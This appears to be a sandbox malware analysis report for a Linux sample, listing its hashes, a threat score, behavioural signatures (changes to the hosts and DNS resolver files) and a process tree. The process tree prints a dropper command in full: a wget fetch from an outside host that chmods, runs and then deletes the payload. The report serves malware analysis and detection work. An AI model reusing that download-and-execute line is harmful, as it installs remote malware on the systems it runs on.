ae3a7bc58c6cdf2f52fe6df2db603740326a89a70e232ee7aa6c4c8c24aeddef

Analysis

max time kernel
0s
max time network
138s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
submitted
25-06-2022 03:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ae3a7bc58c6cdf2f52fe6df2db603740326a89a70e232ee7aa6c4c8c24aeddef
Size

97KB
MD5

3a38ea27050b20a77b7e34ee0c7d5a50
SHA1

f502f9e29a098934571cc5752bad7a1c3884fe95
SHA256

ae3a7bc58c6cdf2f52fe6df2db603740326a89a70e232ee7aa6c4c8c24aeddef
SHA512

8a0b6d3b044220f2a82ca47b33341a787a28c5629d6bacae2f1d32b10e131754711105d6d92d4211a86fcd36e04eea523451ba6d6eced4f500568aae764ed1a4

Score

8^/10

Malware Config

Signatures

Modifies hosts file 1 IoCs

Adds to hosts file used for mapping hosts to IP addresses.

description	ioc	Process
/etc/hosts	/etc/hosts	wget

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
/etc/resolv.conf	/etc/resolv.conf	wget

./ae3a7bc58c6cdf2f52fe6df2db603740326a89a70e232ee7aa6c4c8c24aeddef
./ae3a7bc58c6cdf2f52fe6df2db603740326a89a70e232ee7aa6c4c8c24aeddef
1⤵
PID:571

/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
1⤵
PID:572
- /usr/bin/wget
  wget -q http://gay.energy/.../vivid -O .....
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:576
- /bin/chmod
  chmod 777 .....
  2⤵
  PID:581
- ./.....
  ./.....
  2⤵
  PID:582
- /bin/sh
  /bin/sh ./.....
  2⤵
  PID:582
- /bin/rm
  rm -rf .....
  2⤵
  PID:584

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads